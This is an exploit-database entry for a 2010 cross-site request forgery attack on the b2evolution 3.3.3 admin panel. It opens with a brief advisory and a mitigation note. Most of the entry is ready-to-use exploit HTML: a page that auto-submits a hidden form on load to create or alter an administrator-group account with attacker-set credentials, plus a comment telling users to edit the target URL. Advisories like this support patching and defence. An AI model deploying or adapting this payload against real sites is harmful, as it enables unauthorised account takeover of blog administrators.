header-logo
Suggest Exploit
vendor:
b2evolution
by:
saudi0hacker
7.5
CVSS
HIGH
Cross-Site Request Forgery
352
CWE
Product Name: b2evolution
Affected Version From: 3.3.2003
Affected Version To: 3.3.2003
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested: Linux
2010

b2evolution 3.3.3 Cross site request forgery

The b2evolution 3.3.3 application is vulnerable to Cross-Site Request Forgery (CSRF) attacks. An attacker can create a malicious HTML page that will make a request to the targeted b2evolution admin panel, tricking the authenticated user into performing unintended actions on their behalf.

Mitigation:

To mitigate this vulnerability, users should implement CSRF protection mechanisms such as using anti-CSRF tokens and validating the referer header in requests.
Source

Exploit-DB raw data:

----------------------------------------------------------------------------
: # Exploit Title: b2evolution 3.3.3  Cross site request forgery           :
: # Date: 05/07/2010  & 23/07/1431 H                                       :
: # Author: saudi0hacker                                                   :  
: # Software Link: http://b2evolution.net/downloads/index.html             :
: # Version: 3.3.3                                                         :
: # Tested on: Linux os                                                    : 
: # Greetz to : pr.al7rbi : so busy : evil-ksa : Dr.dakota : v4-team.com   :
----------------------------------------------------------------------------

<html>
<body onload="document.forms['admin'].submit();">
<form name="admin" method="post" action="http://localhost/b2/blogs/admin.php?ctrl=users&user_ID=0&&action=userupdate">  <!-- >> edit the action -->
<input  type="hidden" name="edited_user_grp_ID" value="1">
<input  type="hidden" name="edited_user_firstname">
<input  type="hidden" name="edited_user_locale"> 
<input  type="hidden" name="edited_user_url" >
<input  type="hidden" name="edited_user_icq" >
<input  type="hidden" name="edited_user_aim" >
<input  type="hidden" name="edited_user_msn" >
<input  type="hidden" name="edited_user_yim">
<input  type="hidden" name="edited_user_admin_skin" >
<input  type="hidden" name="edited_user_action_icon_threshold" value="1"  >
<input  type="hidden" name="edited_user_action_word_threshold" value="1"  >
<input  type="hidden" name="edited_user_legend" value="1" >
<input  type="hidden" name="edited_user_bozo" value="1" >
<input  type="hidden" name="edited_user_focusonfirst" value="1" >
<input  type="hidden" name="edited_user_results_per_page" >
<input  type="hidden" name="edited_user_level" value="1" >
<input  type="hidden" name="edited_user_validated"value="1" >
<input  type="hidden" name="edited_user_allow_msgform"value="1" >
<input  type="hidden" name="edited_user_notify"value="1" >
<input  type="hidden" name="edited_user_idmode">
<input  type="hidden" name="edited_user_idmode">

<! Dont edit before these line-->

<input  type="hidden" name="edited_user_email" value="hackededdd@hacked.com" />
<input  type="hidden" name="edited_user_login" value="hackederddd" >
<input  type="hidden" name="edited_user_lastname" value="hackederddd">
<input  type="hidden" name="edited_user_nickname" value="hackederddd">
<input  type="hidden" name="edited_user_pass1"    value="hackederddd"/>
<input  type="hidden" name="edited_user_pass2"    value="hackederddd"/>
<! Coded By Saudi0hacker -->
</form>